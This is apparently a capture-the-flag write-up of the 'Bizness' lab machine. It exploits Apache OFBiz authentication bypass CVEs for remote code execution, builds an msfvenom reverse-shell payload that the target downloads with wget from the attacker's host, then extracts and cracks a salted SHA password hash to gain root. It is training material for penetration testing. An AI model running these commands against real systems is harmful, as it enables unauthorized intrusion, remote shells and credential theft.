Week 1. Bizness

TL;DR

This is an Ubuntu machine running a vulnerable version of ApacheOFBiz (CVE-2023-51467 and CVE-2023-49070). A PoC is used to attack the web server running on port 80 an get initial foothold. The root password hash is found in the file system in base64url format.

KEYWORDS

Apache OFBiz, CVE-2023-51467, CVE-2023-49070, java, base64url.

REFERENCES

https://ofbiz.apache.org

https://www.cvedetails.com/cve/CVE-2023-51467

https://www.cvedetails.com/cve/CVE-2023-49070

https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

https://github.com/apache/ofbiz

https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java

ENUMERATION

Port scan.

> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-07 07:12 EST
Nmap scan report for 10.10.11.252
Host is up, received user-set (0.060s latency).
Not shown: 53021 closed tcp ports (conn-refused), 12509 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack
80/tcp    open  http    syn-ack
443/tcp   open  https   syn-ack
33795/tcp open  unknown syn-ack
41659/tcp open  unknown syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 29.84 seconds

Enumerate the open ports.

> nmap $target -p22,80,443,33795,41659 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-07 07:13 EST
Nmap scan report for 10.10.11.252
Host is up, received user-set (0.10s latency).
Scanned at 2024-01-07 07:13:30 EST for 20s
 
PORT      STATE SERVICE    REASON  VERSION
22/tcp    open  ssh        syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e21d5dc2e61eb8fa63b242ab71c05d3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0B2izYdzgANpvBJW4Ym5zGRggYqa8smNlnRrVK6IuBtHzdlKgcFf+Gw0kSgJEouRe8eyVV9iAyD9HXM2L0N/17+rIZkSmdZPQi8chG/PyZ+H1FqcFB2LyxrynHCBLPTWyuN/tXkaVoDH/aZd1gn9QrbUjSVo9mfEEnUduO5Abf1mnBnkt3gLfBWKq1P1uBRZoAR3EYDiYCHbuYz30rhWR8SgE7CaNlwwZxDxYzJGFsKpKbR+t7ScsviVnbfEwPDWZVEmVEd0XYp1wb5usqWz2k7AMuzDpCyI8klc84aWVqllmLml443PDMIh1Ud2vUnze3FfYcBOo7DiJg7JkEWpcLa6iTModTaeA1tLSUJi3OYJoglW0xbx71di3141pDyROjnIpk/K45zR6CbdRSSqImPPXyo3UrkwFTPrSQbSZfeKzAKVDZxrVKq+rYtd+DWESp4nUdat0TXCgefpSkGfdGLxPZzFg0cQ/IF1cIyfzo1gicwVcLm4iRD9umBFaM2E=
|   256 3911423f0c250008d72f1b51e0439d85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFMB/Pupk38CIbFpK4/RYPqDnnx8F2SGfhzlD32riRsRQwdf19KpqW9Cfpp2xDYZDhA3OeLV36bV5cdnl07bSsw=
|   256 b06fa00a9edfb17a497886b23540ec95 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/3
80/tcp    open  http       syn-ack nginx 1.18.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   syn-ack nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-14T20:03:40
| Not valid after:  2328-11-10T20:03:40
| MD5:   b1822fdb92b020366b988850b66eda27
| SHA-1: 813885954343f40f937bcc8223af90523f5deb50
| -----BEGIN CERTIFICATE-----
| MIIDbTCCAlWgAwIBAgIUcNuUwJFmLYEqrKfOdzHtcHum2IwwDQYJKoZIhvcNAQEL
| BQAwRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAgFw0yMzEyMTQyMDAzNDBaGA8yMzI4
| MTExMDIwMDM0MFowRTELMAkGA1UEBhMCVUsxEzARBgNVBAgMClNvbWUtU3RhdGUx
| ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAK4O2guKkSjwv8sruMD3DiDi1FoappVwDJ86afPZ
| XUCwlhtZD/9gPeXuRIy66QKNSzv8H7cGfzEL8peDF9YhmwvYc+IESuemPscZSlbr
| tSdWXVjn4kMRlah/2PnnWZ/Rc7I237V36lbsavjkY6SgBK8EPU3mAdHNdIBqB+XH
| ME/G3uP/Ut0tuhU1AAd7jiDktv8+c82EQx21/RPhuuZv7HA3pYdtkUja64bSu/kG
| 7FOWPxKTvYxxcWdO02GRXs+VLce+q8tQ7hRqAQI5vwWU6Ht3K82oftVPMZfT4BAp
| 4P4vhXvvcyhrjgjzGPH4QdDmyFkL3B4ljJfZrbXo4jXqp4kCAwEAAaNTMFEwHQYD
| VR0OBBYEFKXr9HwWqLMEFnr6keuCa8Fm7JOpMB8GA1UdIwQYMBaAFKXr9HwWqLME
| Fnr6keuCa8Fm7JOpMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB
| AFruPmKZwggy7XRwDF6EJTnNe9wAC7SZrTPC1gAaNZ+3BI5RzUaOkElU0f+YBIci
| lSvcZde+dw+5aidyo5L9j3d8HAFqa/DP+xAF8Jya0LB2rIg/dSoFt0szla1jQ+Ff
| 6zMNMNseYhCFjHdxfroGhUwYWXEpc7kT7hL9zYy5Gbmd37oLYZAFQv+HNfjHnE+2
| /gTR+RwkAf81U3b7Czl39VJhMu3eRkI3Kq8LiZYoFXr99A4oefKg1xiN3vKEtou/
| c1zAVUdnau5FQSAbwjDg0XqRrs1otS0YQhyMw/3D8X+f/vPDN9rFG8l9Q5wZLmCa
| zj1Tly1wsPCYAq9u570e22U=
|_-----END CERTIFICATE-----
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://bizness.htb/
| tls-nextprotoneg:
|_  http/1.1
|_http-server-header: nginx/1.18.0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
33795/tcp open  tcpwrapped syn-ack
41659/tcp open  tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Nmap done: 1 IP address (1 host up) scanned in 20.45 seconds

Enumerate the web site with Firefox, it seems it is built using Apache OFBiz (https://ofbiz.apache.org/).

For initial foothold, we'll focus on Apache OFBiz vulnerabilities.

USER

Looking for ApacheOFBiz vulnerabilities, we came across these ones: https://www.cvedetails.com/cve/CVE-2023-51467 and https://www.cvedetails.com/cve/CVE-2023-49070

And this PoC: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass

The exploit is supposed to provide direct RCE when executed against the host. We will test if it works issuing a ping command.

> python3 exploit.py --url https://bizness.htb --cmd 'ping 10.10.xxx.xxx'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload
[+] The request has been successfully sent. Check the result of the command.

And verify we receive ICMP requests in Kali.

> sudo tcpdump -i tun0 icmp         
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
07:51:44.559016 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 1, length 64
07:51:44.559027 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 1, length 64
07:51:45.535237 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 2, length 64
07:51:45.535254 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 2, length 64
07:51:46.530163 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 3, length 64
07:51:46.530203 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 3, length 64
07:51:47.503638 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 4, length 64
07:51:47.503654 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 4, length 64
07:51:48.479146 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 5, length 64
07:51:48.479172 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 5, length 64
07:51:49.455000 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 6, length 64
07:51:49.455019 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 6, length 64
07:51:50.435454 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 7, length 64
07:51:50.435471 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 7, length 64
07:51:51.413538 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 8, length 64
07:51:51.413558 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 8, length 64
07:51:52.387469 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 9, length 64
07:51:52.387485 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 9, length 64
07:51:53.374576 IP bizness.htb > 10.10.xxx.xxx: ICMP echo request, id 38936, seq 10, length 64
07:51:53.374592 IP 10.10.xxx.xxx > bizness.htb: ICMP echo reply, id 38936, seq 10, length 64
^C
76 packets captured
76 packets received by filter
0 packets dropped by kernel

Once we have verified the PoC provides direct RCE, next step is gain a reverse on the host. For this, create an msfvenom payload and serve it with a Python web server. Also, start a listener on port 9000.

> msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.xxx.xxx lport=9000 -f elf -a x64
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell
 
> python3 -m http.server 80

Now use the PoC to download the shell payload into the host and execute it.

> python3 exploit.py --url https://bizness.htb --cmd 'wget http://10.10.14.137/shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
 
> python3 exploit.py --url https://bizness.htb --cmd 'chmod +x ./shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
 
> python3 exploit.py --url https://bizness.htb --cmd './shell'
[+] Generating payload...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.

A reverse shell is received on the listener, it can be used to get the user flag.

ROOT

From the low-priv shell on the host, let's look for clear text passwords contained in XML files the filesystem, particularly in the /opt directory, where Apache OFBiz is installed.

> grep --color=always -rn /opt -ie "PASSWORD" 2> /dev/null | grep xml

Some SHA hashes are found, none of them useful though. Next step is to look for password or hashes in the binary files of the Apache OFBIz Derby database.

> grep -E -i -a -o 'password(\W+\w+){0,5}' /opt/ofbiz/runtime/data/derby/ofbiz/seg0/*.dat

This command returns a hash contained in the file /opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

This cannot be cracked as-is, a little investigation is needed to find out where this hash comes from. We need to refer to the Apache OFBiz source code (available at https://github.com/apache/ofbiz) to understand how this hash has been formed. In particular, source for the java app that generates the hash is located at https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java

Reading the java code, we can see the hash is structured as: $SHA$ + SALT +$ + HASH BYTES. Also, it seems the hash bytes are base64url encoded.

Base64url encoding is just a standard base64 encoding where URL-problematic characters, such as / or . are removed, so the resulting string can be used in URL's.

To obtain a crackable hash, we have to revert the process. First we need to restore the URL-removed characters, and then decode the result using standard base64.

Transform base64url back to base64 by replacing _ with /, and - with +. The resulting hash is this.

uP0/QaVBpDWFeo8+dRzDqRwXQ2I

Once we have the base64 string, we just decode it and transform the result to HEX, the final hash obtained is:

b8fd3f41a541a435857a8f3e751cc3a91c174362

Final step is to crack the hash taking into account the salt :d

> hashcat -m 120 -a 0 -d 1 b8fd3f41a541a435857a8f3e751cc3a91c174362:d .\rockyou.txt

The resulting password is used to su root and retrieve the root flag as superuser.